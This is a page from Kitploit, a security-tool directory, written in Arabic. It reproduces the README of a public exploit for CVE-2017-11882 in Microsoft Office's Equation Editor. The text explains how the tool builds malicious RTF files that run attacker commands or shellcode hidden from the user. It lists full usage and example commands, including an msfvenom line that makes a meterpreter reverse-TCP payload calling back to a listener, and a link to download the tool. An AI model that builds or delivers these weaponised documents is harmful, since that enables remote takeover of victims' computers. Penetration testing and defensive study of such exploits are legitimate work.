Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-11882 — CVE-2017-11882 Exploit يقبل أمرًا/كودًا يزيد طوله عن 17 ألف بايت كحد أقصى. | Kitploit
أدوات/GitHubGitHub/rip1s/cve-2017-11882
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقاستغلال الملفات الثنائية
GitHubrip1s/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 Exploit يقبل أمرًا/كودًا يزيد طوله عن 17 ألف بايت كحد أقصى.

عرض المستودع
33092منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2017-11882

يستطيع استغلال CVE-2017-11882 قبول أوامر/أكواد يصل طولها إلى أكثر من 17 كيلوبايت كحد أقصى.

لتنفيذ الأوامر عن بُعد، يقوم هذا الاستغلال باستدعاء WinExec مع SW_HIDE ثم استدعاء ExitProcess بعد عودة WinExec.

لتنفيذ الكود عن بُعد، يقفز هذا الاستغلال مباشرة إلى الكود.

لا يمكنني العثور على مرجع لبنية الكائن... لذا لا يمكنني تغيير طول الملف لتنفيذ كود بطول تعسفي..:(

لكني أعتقد أن 17 كيلوبايت كافية حقًا. سيكتشف سكربت بايثون حجم الحمولة الذي تحتاجه ويختار قالب الحمولة الصحيح.

تحذير: تنفيذ الكود عن بُعد (RCE) سيعلّق عملية Winword إذا لم تقم بالترحيل إلى عملية أخرى!

حاليًا يقوم هذا الاستغلال بحقن الشيل كود الخاص بك في عملية EQNEDT32.EXE جديدة إذا حددت العلم -i. هذه العملية مريبة لأدوات مكافحة الفيروسات لكنها لن تعلّق عملية Word.

الاستخدام

root@kitploit:~
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT

Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)

optional arguments:
  -h, --help            show this help message and exit
  -c CMD, --cmd CMD     Command or shellcode file to run in target system
                        (Must be shorter than 17967 bytes!!)
  -t {0,1}, --type {0,1}
                        Type (0:shellcode 1:command, default=1)
  -i INJECT, --inject INJECT
                        Inject shellcode to new process
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf

مثال:

لتنفيذ الأوامر عن بُعد

root@kitploit:~
CVE-2017-11882.py -c cmd.exe -o test.rtf

لتنفيذ الكود عن بُعد

  1. قم بتوليد بعض الشيل كود
root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
  1. قم بتوليد الاستغلال
root@kitploit:~
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf

التصحيح

  1. عيّن قيمة مصحح الأخطاء إلى مسار مصحح الأخطاء في HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE

  2. قم ببناء استغلال وتشغيله.

  3. عيّن نقطة توقف عند 0x41165f

  4. سيتم الوصول إلى نقطة التوقف هذه مرتين، وفي المرة الثانية سيتم تنفيذ الحمولة بعد عودة هذه الدالة.

المراجع

  1. https://github.com/embedi/CVE-2017-11882
  2. https://embedi.com/files/white-papers/skeleton-in-the-closet.pdf
  3. https://0patch.blogspot.co.id/2017/11/did-microsoft-just-manually-patch-their.html
تنزيل الأداة